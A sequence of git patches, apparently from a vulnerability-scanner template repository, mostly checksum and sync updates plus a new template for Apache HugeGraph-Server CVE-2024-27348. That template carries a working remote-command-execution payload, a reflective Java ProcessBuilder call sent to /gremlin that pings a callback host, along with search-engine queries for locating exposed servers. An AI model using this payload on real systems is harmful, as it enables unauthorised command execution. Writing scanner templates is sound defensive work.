http/exposures/configs/docker-compose-config.yaml:c09c54ae8ef8b7eb9d1afea7fe19ef6b2b0169d3 http/exposures/configs/dockercfg-config.yaml:9379a60ea042ee284d0e6075c43660b6267cb383 http/exposures/configs/dockerfile-hidden-disclosure.yaml:5b74c22b6a4d55f0b5cb8fd47e9a181453340d63 @@ -5332,7 +5332,7 @@ http/misconfiguration/dlink-unauth-cgi-script.yaml:e2461bf769dc0ad41f83df9c7d2f7 http/misconfiguration/docker-daemon-exposed.yaml:840bdb31f81cbeaa2b38bc57b6c1a51cc6007946 http/misconfiguration/docker-registry.yaml:5c7611723d46851a846d043b8fca50d505e5870f http/misconfiguration/docmosis-tornado-server.yaml:f1b6f28d042655fb76f80a329f1d252156dd1e88 -http/misconfiguration/dont-panic-traceback.yaml:787e03c05e44bc4f63f74daceb44435cd8fc73d8 +http/misconfiguration/dont-panic-traceback.yaml:192722987304c72b7a093ab6eb1ec3ffe4985c1a http/misconfiguration/doris-dashboard.yaml:bb6e1b170aec39489117c28663f92f97df6f09c5 http/misconfiguration/druid-monitor.yaml:730666deb48b9f1f6f12affc470425c39e0e9429 http/misconfiguration/drupal/drupal-user-enum-ajax.yaml:dcd541d6927e9930c8f13cbe69c72c1f48a3b44c @@ -8619,7 +8619,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8062ab3a82fb31c59eafa6dbffb1a1206bb77cc2 +templates-checksum.txt:f368afe955ccecc89d90d8281f5db900e46f08c4 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c6409ef11ecae5c296884660b0280276c8156285 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Sun, 2 Jun 2024 16:39:03 +0000 Subject: [PATCH 609/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 4fcb0240cf..bd3eff7e7e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -24,6 +24,7 @@ on: - 'http/exposed-panels/digital-watchdog-panel.yaml' - 'http/exposed-panels/fortinet/fortisiem-panel.yaml' - 'http/exposed-panels/oracle-access-management.yaml' + - 'http/exposed-panels/oracle-peoplesoft-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/iot/netgear-boarddataww-rce.yaml' From cebc145ae81f56dc6af0c74c70f265285a539429 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 16:40:07 +0000 Subject: [PATCH 610/847] Auto Template Signing [Sun Jun 2 16:40:07 UTC 2024] :robot: --- http/exposed-panels/oracle-peoplesoft-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/oracle-peoplesoft-panel.yaml b/http/exposed-panels/oracle-peoplesoft-panel.yaml index 5058818389..27836986ac 100644 --- a/http/exposed-panels/oracle-peoplesoft-panel.yaml +++ b/http/exposed-panels/oracle-peoplesoft-panel.yaml @@ -49,3 +49,4 @@ http: group: 1 regex: - '(?i)\*\s+Copyright\s+\(c\)\s+([0-9,\s]+)\s+Oracle\s+and\/or\s+its\s+affiliates.' +# digest: 4a0a0047304502201eca0f3db12b2f9d439b3971dad26d9573b0fbf4b33c1a6071c81a079c5f1f2802210099e23750825396d1b6c5c84087359da16ff76b94a617090d147d08e12b9faddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 73693100d6ea3311d3cafc428ce4269997b2c4ce Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 00:03:37 +0530 Subject: [PATCH 611/847] Create CVE-2024-27348.yaml --- http/cves/2024/CVE-2024-27348.yaml | 39 ++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 http/cves/2024/CVE-2024-27348.yaml diff --git a/http/cves/2024/CVE-2024-27348.yaml b/http/cves/2024/CVE-2024-27348.yaml new file mode 100644 index 0000000000..4f8b94b434 --- /dev/null +++ b/http/cves/2024/CVE-2024-27348.yaml @@ -0,0 +1,39 @@ +id: CVE-2024-27348 + +info: + name: Apache HugeGraph-Server Command Execution In Gremlin + author: DhiyaneshDK + severity: high + description: | + Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component. + reference: + - https://example.com/gremlin-vulnerability-details + - http://www.openwall.com/lists/oss-security/2024/04/22/3 + - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication + - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9 + - https://github.com/fkie-cad/nvd-json-data-feeds + classification: + epss-score: 0.00045 + epss-percentile: 0.15047 + metadata: + verified: true + max-request: 1 + shodan-query: title:"HugeGraph Studio" + fofa-query: title="HugeGraph Studio" + tags: cve,cve2024,hugegraph,rce,unauth,apache + +http: + - raw: + - | + POST /gremlin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "dns" From 1aa0726ef9562cc36d7d2ad8f624642907c3597f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 00:16:00 +0530 Subject: [PATCH 612/847] minor update --- http/cves/2024/CVE-2024-27348.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-27348.yaml b/http/cves/2024/CVE-2024-27348.yaml index 4f8b94b434..9a41915ccc 100644 --- a/http/cves/2024/CVE-2024-27348.yaml +++ b/http/cves/2024/CVE-2024-27348.yaml @@ -7,11 +7,11 @@ info: description: | Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component. reference: - - https://example.com/gremlin-vulnerability-details - http://www.openwall.com/lists/oss-security/2024/04/22/3 - https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9 - - https://github.com/fkie-cad/nvd-json-data-feeds + - https://github.com/Zeyad-Azima/CVE-2024-27348 + - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348 classification: epss-score: 0.00045 epss-percentile: 0.15047 @@ -34,6 +34,16 @@ http: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - - "dns" + - 'dns' + + - type: word + part: body + words: + - '"inputStream":' + + - type: word + part: header + words: + - 'application/json' From 7fbcbe5f2f9fe312cc3142faeb09426df14383f7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 3 Jun 2024 00:25:09 +0530 Subject: [PATCH 613/847] Update oracle-peoplesoft-workflow.yaml --- workflows/oracle-peoplesoft-workflow.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/workflows/oracle-peoplesoft-workflow.yaml b/workflows/oracle-peoplesoft-workflow.yaml index c757e1e648..609da79247 100644 --- a/workflows/oracle-peoplesoft-workflow.yaml +++ b/workflows/oracle-peoplesoft-workflow.yaml @@ -5,6 +5,6 @@ info: author: LogicalHunter description: A simple workflow that runs all oracle-peoplesoft related nuclei templates on a given target. workflows: - - template: http/exposed-panels/oracle-people-sign-in.yaml + - template: http/exposed-panels/oracle-peoplesoft-panel.yaml subtemplates: - tags: oracle From dd8ad0cfda6001535d567c241b84ab005bb1ce5d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 2 Jun 2024 18:58:34 +0000 Subject: [PATCH 615/847] Auto Generated Templates Checksum [Sun Jun 2 18:58:34 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 46d7312833..af6e1042bb 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4205,7 +4205,7 @@ http/exposed-panels/oracle-enterprise-manager-login.yaml:76e328b658d117d5c45bd8f http/exposed-panels/oracle-integrated-manager.yaml:33fabda935c2ddc490939f8e5d5abc27fd5f1f49 http/exposed-panels/oracle-opera-login.yaml:1a1e64aebaeb4635b85cfcdfe7f88b1856e35c3f http/exposed-panels/oracle-people-enterprise.yaml:1d99296ada4cbb377939cfb07a4171a2569d36ea -http/exposed-panels/oracle-peoplesoft-panel.yaml:d8a82c1cd1554621b203704ed6dfcc00d116260e +http/exposed-panels/oracle-peoplesoft-panel.yaml:eb9fba3f40daeaa613feb341a707ac588a667514 http/exposed-panels/orchid-vms-panel.yaml:ea0e836bcb094ab56245bb733490e2c210fdba72 http/exposed-panels/osnexus-panel.yaml:1397581ae2c1d7c2943eac8291ce75e8444bcf09 http/exposed-panels/osticket/osticket-install.yaml:622ae6b555a887e823b9252eb9509ffb1b7d155f @@ -8619,7 +8619,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f368afe955ccecc89d90d8281f5db900e46f08c4 +templates-checksum.txt:6b352658775d49791d9fbda942444861808c7dc8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 @@ -8734,7 +8734,7 @@ workflows/openam-workflow.yaml:286671eeaf241149216c55a6f1ea18bef70d95fd workflows/openemr-workflow.yaml:e1a6dc22407b6659a92dc1ce979401418b155270 workflows/opensis-workflow.yaml:04ea09f494dbe64e896dc62191acb37631a558a4 workflows/opensns-workflow.yaml:631f08f739a6827fec065a7bb3ae7b4488cfef7d -workflows/oracle-peoplesoft-workflow.yaml:0151f6d85fd570ef945ac9c46cbfa0e530412f6a +workflows/oracle-peoplesoft-workflow.yaml:f604aefbaed9ecb6b9e6cf049727b9fa7c7d006a workflows/oscommerce-workflow.yaml:60dec9d6d4db5cf37d2042c7c55d4914e79dc685 workflows/pandora-workflow.yaml:615f695d49a831d89719b3337ad6db950fdde879 workflows/pega-workflow.yaml:a0d28d07bc435a6d649c1cb555eb3714b9905190 From 3b13bb4a4d2991f5ff637397caff16634604d48f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 3 Jun 2024 12:47:33 +0530 Subject: [PATCH 616/847] Update CVE-2024-27348.yaml --- http/cves/2024/CVE-2024-27348.yaml | 28 +++++++++++----------------- 1 file changed, 11 insertions(+), 17 deletions(-) diff --git a/http/cves/2024/CVE-2024-27348.yaml b/http/cves/2024/CVE-2024-27348.yaml index 9a41915ccc..8ea9e840a5 100644 --- a/http/cves/2024/CVE-2024-27348.yaml +++ b/http/cves/2024/CVE-2024-27348.yaml @@ -1,7 +1,7 @@ id: CVE-2024-27348 info: - name: Apache HugeGraph-Server Command Execution In Gremlin + name: Apache HugeGraph-Server - Remote Command Execution author: DhiyaneshDK severity: high description: | @@ -12,7 +12,10 @@ info: - https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9 - https://github.com/Zeyad-Azima/CVE-2024-27348 - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348 + - https://nvd.nist.gov/vuln/detail/CVE-2024-27348 classification: + cve-id: CVE-2024-27348 + cwe-id: CWE-77 epss-score: 0.00045 epss-percentile: 0.15047 metadata: @@ -20,7 +23,7 @@ info: max-request: 1 shodan-query: title:"HugeGraph Studio" fofa-query: title="HugeGraph Studio" - tags: cve,cve2024,hugegraph,rce,unauth,apache + tags: cve,cve2024,hugegraph,rce,apache http: - raw: @@ -31,19 +34,10 @@ http: {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}} - matchers-condition: and matchers: - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - 'dns' - - - type: word - part: body - words: - - '"inputStream":' - - - type: word - part: header - words: - - 'application/json' + - type: dsl + dsl: + - 'contains(interactsh_protocol, "dns")' + - 'contains(header, "application/json")' + - 'contains(body, "inputStream\":")' + condition: and From 62aafdb7a41b91fccf9530c68c0e29e25e7a577f Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 3 Jun 2024 08:55:25 +0000 Subject: [PATCH 617/847] Auto Generated New Template Addition List [Mon Jun 3 08:55:24 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f71bbbc72d..05d9cd9168 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ headless/webpack-sourcemap.yaml http/cnvd/2024/CNVD-2024-15077.yaml +http/cves/2022/CVE-2022-0666.yaml http/cves/2022/CVE-2022-1580.yaml http/cves/2022/CVE-2022-34534.yaml http/cves/2023/CVE-2023-2059.yaml From 1b3320dae6a2b6547a43179209d0696b6bcf166c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 08:55:29 +0000 Subject: [PATCH 618/847] Auto Generated Templates Checksum [Mon Jun 3 08:55:29 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index af6e1042bb..d19da2087a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2447,6 +2447,7 @@ http/cves/2022/CVE-2022-0653.yaml:52274e93b6ea8926e170293dce796d792a5e0a48 http/cves/2022/CVE-2022-0656.yaml:2975cb24c367f2e0bf11b3a966529591c8ed2edf http/cves/2022/CVE-2022-0658.yaml:2b1f5971384f81ffce9e3a8427555bbd01b3b3a5 http/cves/2022/CVE-2022-0660.yaml:847e3682f3a3903749f0d44adf0697a838a405e4 +http/cves/2022/CVE-2022-0666.yaml:9333df97b369c29cff7be3249e4eaaa7257fd446 http/cves/2022/CVE-2022-0678.yaml:8b33e92b350e562c7bece96f5e9328e7319792ae http/cves/2022/CVE-2022-0679.yaml:bb862b57bb18b1832313bed2c8f3095286ab5f0b http/cves/2022/CVE-2022-0692.yaml:16bb78665f4c62b041bf0641d2afe49587c40472 @@ -8619,7 +8620,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6b352658775d49791d9fbda942444861808c7dc8 +templates-checksum.txt:816536bc24b240f6eebd29134f71e4e01fb99ca8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e4c9e783c0557a7adde7c37bec1551a78f1f2a4f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 08:55:31 +0000 Subject: [PATCH 619/847] Auto Generated cves.json [Mon Jun 3 08:55:31 UTC 2024] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index c65ce3d4eb..f21b56b2f4 100644 --- a/cves.json +++ b/cves.json @@ -1550,6 +1550,7 @@ {"ID":"CVE-2022-0656","Info":{"Name":"uDraw \u003c3.3.3 - Local File Inclusion","Severity":"high","Description":"uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0656.yaml"} {"ID":"CVE-2022-0658","Info":{"Name":"CommonsBooking \u003c 2.6.8 - SQL Injection","Severity":"critical","Description":"The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0658.yaml"} {"ID":"CVE-2022-0660","Info":{"Name":"Microweber \u003c1.2.11 - Information Disclosure","Severity":"high","Description":"Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0660.yaml"} +{"ID":"CVE-2022-0666","Info":{"Name":"Microweber \u003c 1.2.11 - CRLF Injection","Severity":"high","Description":"CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in Packagist microweber/microweber prior to 1.2.11.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0666.yaml"} {"ID":"CVE-2022-0678","Info":{"Name":"Microweber \u003c1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0678.yaml"} {"ID":"CVE-2022-0679","Info":{"Name":"WordPress Narnoo Distributor \u003c=2.5.1 - Local File Inclusion","Severity":"critical","Description":"WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0679.yaml"} {"ID":"CVE-2022-0692","Info":{"Name":"Rudloff alltube prior to 3.0.1 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0692.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 1f5792643e..08b6bfcb99 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -0cf7a96430fadd9e4602ab1fd647e275 +e808b27672b538f74b345e3d92eb4a9f From f5d5745e125d7fde25230f8f669a7d7cb85b5934 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 3 Jun 2024 08:56:17 +0000 Subject: [PATCH 620/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index bd3eff7e7e..e6f0d8ab54 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'headless/webpack-sourcemap.yaml' - 'http/cnvd/2024/CNVD-2024-15077.yaml' + - 'http/cves/2022/CVE-2022-0666.yaml' - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2022/CVE-2022-34534.yaml' - 'http/cves/2023/CVE-2023-2059.yaml' From 7bba4a2c0f8b2761f904e33b10dd533d06e8f082 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 3 Jun 2024 08:56:38 +0000 Subject: [PATCH 621/847] Auto Generated New Template Addition List [Mon Jun 3 08:56:38 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 05d9cd9168..a025f3b8c0 100644 --- a/.new-additions +++ b/.new-additions @@ -61,3 +61,4 @@ http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml network/detection/bitvise-ssh-detect.yaml +passive/cves/2024/CVE-2024-25723.yaml From 7f9561984ddc5d5fc4789f1e7785fc2157ce575f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 08:56:47 +0000 Subject: [PATCH 622/847] Auto Generated Templates Checksum [Mon Jun 3 08:56:47 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d19da2087a..00f4fa1fa5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:f096845ddb0fa602cfb3fc900f94a098c42ea15b -cves.json-checksum.txt:022276eb87f506fd930108e9e921ca6765d0b969 +cves.json:6c374eeb1f547d318a2f0d87d01236bef68c380c +cves.json-checksum.txt:0b1d7e32abf421aa809f190ddd8f70823694eb05 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -8576,6 +8576,7 @@ network/misconfig/tidb-native-password.yaml:e59b6ae7f999845de1660e740e99c300175f network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740 network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37 +passive/cves/2024/CVE-2024-25723.yaml:1408ea431542b2e64d0c2e3945a0452e45301fd0 profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33 profiles/all.yml:da115a47ed611622537dfbbe17e912010916c741 profiles/aws-cloud-config.yml:35d9feaf76e79bf9b83a33f0f95803a8cc97a9cc @@ -8620,7 +8621,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:816536bc24b240f6eebd29134f71e4e01fb99ca8 +templates-checksum.txt:c31b229fb0da2ec8ad9b16ad0689dc7857e04240 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 44142b84c45c916df42154b14af87aa448b0febe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 08:57:15 +0000 Subject: [PATCH 623/847] Auto Template Signing [Mon Jun 3 08:57:15 UTC 2024] :robot: --- http/cves/2022/CVE-2022-0666.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2022/CVE-2022-0666.yaml b/http/cves/2022/CVE-2022-0666.yaml index 9c53b2277a..251c13f693 100644 --- a/http/cves/2022/CVE-2022-0666.yaml +++ b/http/cves/2022/CVE-2022-0666.yaml @@ -34,3 +34,4 @@ http: part: header regex: - "^Set-Cookie: crlfinjection=1;" +# digest: 4b0a00483046022100dbd652bb2a658ea86b3c2000925f84a9d94f2590ae25dcf69528a640aad4d9db022100ca9fb2e31600744fe5f05e0df21043f5c3922f1b82c6ab3729780e0e2e4203b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 24d27ff16258ca14a6683a57644bffc33dc14a46 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 3 Jun 2024 08:57:27 +0000 Subject: [PATCH 624/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e6f0d8ab54..9337c8a45f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -66,6 +66,7 @@ on: - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' - 'network/detection/bitvise-ssh-detect.yaml' + - 'passive/cves/2024/CVE-2024-25723.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 471b3a5ba3876cf101b51a2c7d7edbbf81196e81 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 09:01:59 +0000 Subject: [PATCH 625/847] Auto Template Signing [Mon Jun 3 09:01:59 UTC 2024] :robot: --- passive/cves/2024/CVE-2024-25723.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/passive/cves/2024/CVE-2024-25723.yaml b/passive/cves/2024/CVE-2024-25723.yaml index 3d34c505da..de606fe734 100644 --- a/passive/cves/2024/CVE-2024-25723.yaml +++ b/passive/cves/2024/CVE-2024-25723.yaml @@ -47,3 +47,4 @@ http: regex: - '"version":"(.*?)"' internal: true +# digest: 4a0a00473045022100a3620df7f00a1667d7ff1a1a8334e1e280a30c3ff0b67dae912a60cfd78e85750220406c282e2b21dfaded95153cb05a70fc5e53f06119c22e81d98cc24b8345d94b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7abea3004f5d2ac18d04e2a2ff3ba1fb304d2208 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 3 Jun 2024 14:32:41 +0530 Subject: [PATCH 626/847] update metadata --- http/cves/2024/CVE-2024-27348.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2024/CVE-2024-27348.yaml b/http/cves/2024/CVE-2024-27348.yaml index 8ea9e840a5..1cf870bafa 100644 --- a/http/cves/2024/CVE-2024-27348.yaml +++ b/http/cves/2024/CVE-2024-27348.yaml @@ -21,8 +21,8 @@ info: metadata: verified: true max-request: 1 - shodan-query: title:"HugeGraph Studio" - fofa-query: title="HugeGraph Studio" + shodan-query: title:"HugeGraph" + fofa-query: title="HugeGraph" tags: cve,cve2024,hugegraph,rce,apache http: From 9a5c0cae2d06078a2ef555101ae4df27d033ead2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 3 Jun 2024 09:05:42 +0000 Subject: [PATCH 627/847] Auto Generated Templates Checksum [Mon Jun 3 09:05:42 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 00f4fa1fa5..49882b27ee 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2447,7 +2447,7 @@ http/cves/2022/CVE-2022-0653.yaml:52274e93b6ea8926e170293dce796d792a5e0a48 http/cves/2022/CVE-2022-0656.yaml:2975cb24c367f2e0bf11b3a966529591c8ed2edf 